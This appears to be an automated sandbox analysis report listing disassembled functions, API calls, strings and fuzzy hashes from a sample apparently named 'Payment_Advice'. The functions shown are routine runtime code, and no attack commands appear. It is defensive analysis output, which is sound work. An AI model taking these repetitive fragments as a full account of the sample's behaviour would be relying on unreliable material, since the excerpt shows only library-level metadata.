                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00502210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00502536
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                      • Part of subcall function 005105DA: _wcslen.LIBCMT ref: 005105E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                    • Opcode ID: c4ad530ce98c8d122bdd6cf70726807b13e061a042b1133ba8f30b525f7f86bd
                                                                                                    • Instruction ID: 3a70f7c2d6f2b2edbcdb656bf33f58321ff1446e66d99c32d707fba4bc091328
                                                                                                    • Opcode Fuzzy Hash: c4ad530ce98c8d122bdd6cf70726807b13e061a042b1133ba8f30b525f7f86bd
                                                                                                    • Instruction Fuzzy Hash: D5F1E5706043419BDB25DB24C49EBEE7F997FD1300F084A6DED8A9B2C3CB649D498762
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00519CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                    • API String ID: 176396367-3568243669
                                                                                                    • Opcode ID: 21568996543fc41b39f067d1447778a8e078d3575e5ef6eb232f564513ae75f8
                                                                                                    • Instruction ID: 13c6efa31b4b880cd10cc0ea95a883fc78f4a5a564e5565b62af717c2561cea2
                                                                                                    • Opcode Fuzzy Hash: 21568996543fc41b39f067d1447778a8e078d3575e5ef6eb232f564513ae75f8
                                                                                                    • Instruction Fuzzy Hash: C9512D6A74032395FB349A15E8317F67BE4FFA1790F59091AF9C18B1C0FB658CC182A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0052FE02,00000000,00000000,00000000,00000000,00000000,0052529F), ref: 0052F6CF
                                                                                                    • __fassign.LIBCMT ref: 0052F74A
                                                                                                    • __fassign.LIBCMT ref: 0052F765
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0052F78B
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0052FE02,00000000,?,?,?,?,?,?,?,?,?,0052FE02,00000000), ref: 0052F7AA
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0052FE02,00000000,?,?,?,?,?,?,?,?,?,0052FE02,00000000), ref: 0052F7E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: d0284fd9ce6b084448296a9281fef565d475d080b14f3c330da6e76060812302
                                                                                                    • Instruction ID: 2896ddabf01acd8d20f12603a89a1242f3812c26a88ecdc43d8b178f097a6a1c
                                                                                                    • Opcode Fuzzy Hash: d0284fd9ce6b084448296a9281fef565d475d080b14f3c330da6e76060812302
                                                                                                    • Instruction Fuzzy Hash: EB5191B1D002599FCB10CFA8E885AEEFFF4FF19300F14416AE555E7291E670AA45CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00522937
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0052293F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005229C8
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005229F3
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00522A48
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 6bf01cf49affbc275962cb0b6af8ccd482d6cc88a37c87f28c7340d007f91d4c
                                                                                                    • Instruction ID: 4124639d62d3f3f482910be31ae905b5bb88302287f05a7deaf500561f985d4e
                                                                                                    • Opcode Fuzzy Hash: 6bf01cf49affbc275962cb0b6af8ccd482d6cc88a37c87f28c7340d007f91d4c
                                                                                                    • Instruction Fuzzy Hash: 2241B538A00229AFCF10DF28D885A9EBFE1BF46314F148055E8156B3D2D771DA85CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00519955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                    • API String ID: 176396367-3743748572
                                                                                                    • Opcode ID: a827f19a5cb8ddf34e7e9de6edb7a314a440395f6586f29cd7ef67c9c460b3b6
                                                                                                    • Instruction ID: 9a081db6e9e01c74fd63853f69d9df42e0c2d76cb9bd229a6e268b29ec4759ce
                                                                                                    • Opcode Fuzzy Hash: a827f19a5cb8ddf34e7e9de6edb7a314a440395f6586f29cd7ef67c9c460b3b6
                                                                                                    • Instruction Fuzzy Hash: F0315E3264434656FA30AF94AC56BF67BA4FF90720F60441EF482472C0FA64BEC983A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0052C868: _free.LIBCMT ref: 0052C891
                                                                                                    • _free.LIBCMT ref: 0052C8F2
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 0052C8FD
                                                                                                    • _free.LIBCMT ref: 0052C908
                                                                                                    • _free.LIBCMT ref: 0052C95C
                                                                                                    • _free.LIBCMT ref: 0052C967
                                                                                                    • _free.LIBCMT ref: 0052C972
                                                                                                    • _free.LIBCMT ref: 0052C97D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                    • Instruction ID: 2d6e3112ca0682c3d95b44b3c215be18d2f01a1e7afcbdd61b0f8a855346d605
                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                    • Instruction Fuzzy Hash: DE113072581726A6E520B7B1EC0BFDF7FACBF82B00F404C15B29D660E3DA65B5098B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0051E669,0051E5CC,0051E86D), ref: 0051E605
                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0051E61B
                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0051E630
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                    • API String ID: 667068680-1718035505
                                                                                                    • Opcode ID: d03f292f8818a63080e0b20e5fa920a8bfdb8ff547dfa74b9744795a544e3ec2
                                                                                                    • Instruction ID: 97c7be29a002a1ce706fee1f7a96f608b91470b61c2c511c43cc67db2209dd19
                                                                                                    • Opcode Fuzzy Hash: d03f292f8818a63080e0b20e5fa920a8bfdb8ff547dfa74b9744795a544e3ec2
                                                                                                    • Instruction Fuzzy Hash: C4F0AF317806229BBF214F686C8B9FA2EC87A357813440439DD05D3210FB508CD9AB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0052891E
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 00528930
                                                                                                    • _free.LIBCMT ref: 00528943
                                                                                                    • _free.LIBCMT ref: 00528954
                                                                                                    • _free.LIBCMT ref: 00528965
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: pS
                                                                                                    • API String ID: 776569668-3706138410
                                                                                                    • Opcode ID: 4dda546085469247b7abe76814152958ebcad4996b6eaf4e4387454d46381fc0
                                                                                                    • Instruction ID: 64c9f098493d2763d45590d19588eafea8983131cee881fd6d55b3ab0c2be58b
                                                                                                    • Opcode Fuzzy Hash: 4dda546085469247b7abe76814152958ebcad4996b6eaf4e4387454d46381fc0
                                                                                                    • Instruction Fuzzy Hash: 62F03A768129338B9A466F58FC064293FE5FB36710B000906F014933F5CFB9495DBB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 005114C2
                                                                                                      • Part of subcall function 0050B146: GetVersionExW.KERNEL32(?), ref: 0050B16B
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005114E6
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00511500
                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00511513
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511523
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511533
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2092733347-0
                                                                                                    • Opcode ID: a60f78b73b83d5fe2ac4d22aaa48fe69e69f6cdb0a9fe0139ae0e3c499078a0b
                                                                                                    • Instruction ID: 0e4362385c1d505b0e5ad4ece3eb227d736e84161c9c3fc6d424b1c6a8114057
                                                                                                    • Opcode Fuzzy Hash: a60f78b73b83d5fe2ac4d22aaa48fe69e69f6cdb0a9fe0139ae0e3c499078a0b
                                                                                                    • Instruction Fuzzy Hash: 7C31E875108346ABC704DFA8C88499BBBF8BF98714F004A1EF995C3210E734D649CBA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00522AF1,005202FC,0051FA34), ref: 00522B08
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00522B16
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00522B2F
                                                                                                    • SetLastError.KERNEL32(00000000,00522AF1,005202FC,0051FA34), ref: 00522B81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: 11ee6c4e70e98e0732ea0b3be7cf4f89bb100e138d2ea58208921a548d8a93e4
                                                                                                    • Instruction ID: 9798a4e5bddea20de370702c6c6317e7b78964dba3ff121f7324d86e5605ffb9
                                                                                                    • Opcode Fuzzy Hash: 11ee6c4e70e98e0732ea0b3be7cf4f89bb100e138d2ea58208921a548d8a93e4
                                                                                                    • Instruction Fuzzy Hash: 1801843A1193327EE7182B747C8AA272F99FFA37B4F60073AF510556E0EF555D04A244
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005297E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00541098,00524674,00541098,?,?,005240EF,?,?,00541098), ref: 005297E9
                                                                                                    • _free.LIBCMT ref: 0052981C
                                                                                                    • _free.LIBCMT ref: 00529844
                                                                                                    • SetLastError.KERNEL32(00000000,?,00541098), ref: 00529851
                                                                                                    • SetLastError.KERNEL32(00000000,?,00541098), ref: 0052985D
                                                                                                    • _abort.LIBCMT ref: 00529863
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: d1e9e61099575120c679e7bdf23ef6c66f0d30d3ce2fad4eb54e46ba4aae96de
                                                                                                    • Instruction ID: 8628e20fe71b5cbaf5b2b90c508183e941b1a0ed378a4f6de16e00b0485392ab
                                                                                                    • Opcode Fuzzy Hash: d1e9e61099575120c679e7bdf23ef6c66f0d30d3ce2fad4eb54e46ba4aae96de
                                                                                                    • Instruction Fuzzy Hash: 18F0A43614063267D7163364BC1EB2B1E69BFE3761F290524F614923D2FE20880A9565
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0051DC47
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051DC61
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051DC72
                                                                                                    • TranslateMessage.USER32(?), ref: 0051DC7C
                                                                                                    • DispatchMessageW.USER32(?), ref: 0051DC86
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0051DC91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 2148572870-0
                                                                                                    • Opcode ID: 790e3d1ffcf784145aea9fe51501aa30cb64c82102089a46e53273ff284681f9
                                                                                                    • Instruction ID: cbe60d9d81ef40de8526f6d329a92ebeef8d137c45d4fc5e0e4fd1619c6f8294
                                                                                                    • Opcode Fuzzy Hash: 790e3d1ffcf784145aea9fe51501aa30cb64c82102089a46e53273ff284681f9
                                                                                                    • Instruction Fuzzy Hash: D3F03C72A01219BBCB206BA5DC4CDCB7F7DEF527A1B004421F50AD2050D675868ED7F0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0051A699: GetDC.USER32(00000000), ref: 0051A69D
                                                                                                      • Part of subcall function 0051A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0051A6A8
                                                                                                      • Part of subcall function 0051A699: ReleaseDC.USER32(00000000,00000000), ref: 0051A6B3
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0051A83C
                                                                                                      • Part of subcall function 0051AAC9: GetDC.USER32(00000000), ref: 0051AAD2
                                                                                                      • Part of subcall function 0051AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0051AB01
                                                                                                      • Part of subcall function 0051AAC9: ReleaseDC.USER32(00000000,?), ref: 0051AB99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
